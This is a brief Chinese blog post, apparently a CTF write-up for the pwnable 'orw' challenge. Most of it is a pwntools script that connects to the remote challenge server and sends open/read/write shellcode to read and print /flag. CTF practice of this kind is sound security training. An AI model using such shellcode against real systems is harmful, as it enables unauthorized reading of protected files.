pwnable_orw 学习shellcraft新花样
写shellcode,由于我还没开始写反汇编引擎,所以直接去百度了下
把提权函数给ban了,所以只能直接读取flag,看了下pwnki师傅的博客
学到了shellcraft的新花样,有意思
from pwn import * #p=process('./orw') p=remote('node3.buuoj.cn',26136) shellcode = shellcraft.open('/flag') shellcode += shellcraft.read('eax','esp',100) shellcode += shellcraft.write(1,'esp',100) shellcode = asm(shellcode) p.sendline(shellcode) p.interactive()